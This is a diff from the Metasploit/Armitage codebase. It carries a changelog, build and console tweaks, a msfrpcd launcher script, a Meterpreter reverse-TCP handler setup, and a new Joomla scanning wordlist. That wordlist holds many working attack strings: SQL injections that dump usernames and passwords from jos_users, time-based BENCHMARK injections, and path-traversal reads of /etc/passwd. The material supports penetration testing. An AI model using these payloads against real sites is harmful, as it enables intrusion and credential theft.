diff --git a/.travis.yml b/.travis.yml
index 6411d11c22..6b74b25154 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -6,3 +6,5 @@ rvm:
 notifications:
 irc: "irc.freenode.org#msfnotify"
+git:
+ depth: 1
diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar
index 5ccd4ac15a..153f8f95c0 100755
Binary files a/data/armitage/armitage.jar and b/data/armitage/armitage.jar differ
diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar
index 28f15b5fd1..94bebc6eac 100644
Binary files a/data/armitage/cortana.jar and b/data/armitage/cortana.jar differ
diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt
index 5ea39884dd..c1e03e579b 100755
--- a/data/armitage/whatsnew.txt
+++ b/data/armitage/whatsnew.txt
@@ -1,6 +1,32 @@
 Armitage Changelog
 ==================
+23 Jan 13 (tested against msf 16351)
+---------
+- Added helpers to set EXE::Custom and EXE::Template options.
+- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
+- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
+ check if a proxy server is up was deadlock prone. Removed it.
+- Starting SOCKS Proxy module now opens a tab displaying the module
+ start process. An event is posted to the event log too.
+- Created an option helper to select credentials for SMBUser, SMBPass,
+ USERNAME, and PASSWORD.
+- Added a feature to label hosts. A label will show up in its own column
+ in table view or below all info in graph view. Any team member may
+ change a label through [host] -> host -> Set Label. You may also use
+ dynamic workspaces to show hosts with certain labels attached.
+- Fixed bad things happening when connecting Armitage to 'localhost' and
+ not '127.0.0.1'.
+- Screenshots and Webcam shots are now centered in their tab.
+- Added an alternate .bat file to start msfrpcd on Windows in the
+ Metasploit 4.5 installer's environment.
+- Added a color-style for [!] warning messages
+
+Cortana Updates (for scripters)
+--------
+- &handler function now works as advertised.
+- Cortana now avoids use of core.setg
+
 4 Jan 13 (tested against msf 16252)
 --------
 - Added a helper to set REXE option
diff --git a/data/wordlists/joomla.txt b/data/wordlists/joomla.txt
new file mode 100755
index 0000000000..b1e651d504
--- /dev/null
+++ b/data/wordlists/joomla.txt
@@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php 
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery 
+components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ 
+components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ 
+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ 
+components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ 
+components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ 
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/">/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] 
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= 
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= 
+index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' 
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube 
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' diff --git a/external/source/armitage/build.xml b/external/source/armitage/build.xml index b9d4ca043e..f5bac934dc 100644 --- a/external/source/armitage/build.xml +++ b/external/source/armitage/build.xml @@ -16,6 +16,8 @@ depend="yes" debug="true" optimize="yes" + target="1.6" + source="1.6" includeantruntime="fuckno" > diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index 85c4fe5dbb..e19056effa 100644 
--- a/external/source/armitage/resources/about.html
+++ b/external/source/armitage/resources/about.html
@@ -3,7 +3,7 @@

Armitage 1.45

An attack management tool for Metasploit® -
Release: 4 Jan 13

+
Release: 23 Jan 13


Developed by:

diff --git a/external/source/armitage/resources/msfconsole.style b/external/source/armitage/resources/msfconsole.style
index a8aa516621..3d927f37a9 100644
--- a/external/source/armitage/resources/msfconsole.style
+++ b/external/source/armitage/resources/msfconsole.style
@@ -4,6 +4,7 @@
 ^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) >
 ^\[\*\] (.*) \cC[*]\o $1
 ^\[\+\] (.*) \c9[+]\o $1
+^\[\!\] (.*) \c8[!]\o $1
 ^\[\-\] (.*) \c4[-]\o $1
 ^ =\[ (.*) =[\c7 $1
 ^(=[=\s]+) \cE$1
diff --git a/external/source/armitage/resources/msfrpcd_new.bat b/external/source/armitage/resources/msfrpcd_new.bat
new file mode 100644
index 0000000000..b1bcb31a21
--- /dev/null
+++ b/external/source/armitage/resources/msfrpcd_new.bat
@@ -0,0 +1,12 @@
+@echo off
+set BASE=$$BASE$$..\..\
+cd "%BASE%"
+set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH%
+IF NOT EXIST "%BASE%java" GOTO NO_JAVA
+set JAVA_HOME="%BASE%java"
+:NO_JAVA
+set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"
+set MSF_BUNDLE_GEMS=0
+set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile
+cd "%BASE%apps\pro\msf3"
+rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$
diff --git a/external/source/armitage/scripts-cortana/cortanadb.sl b/external/source/armitage/scripts-cortana/cortanadb.sl
index 97eae7e56b..8b1842f5fc 100644
--- a/external/source/armitage/scripts-cortana/cortanadb.sl
+++ b/external/source/armitage/scripts-cortana/cortanadb.sl
@@ -42,8 +42,13 @@ sub c_client {
 sub setupHandlers {
 find_job("Exploit: multi/handler", {
 if ($1 == -1) {
+ # set LPORT for the user...
+ local('$c');
+ $c = call($client, "console.allocate")['id'];
+ call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n");
+ call($client, "console.release", $c);
+
 # setup a handler for meterpreter
- call($client, "core.setg", "LPORT", randomPort());
 call($client, "module.execute", "exploit", "multi/handler", %(
 PAYLOAD => "windows/meterpreter/reverse_tcp",
 LHOST => "0.0.0.0",
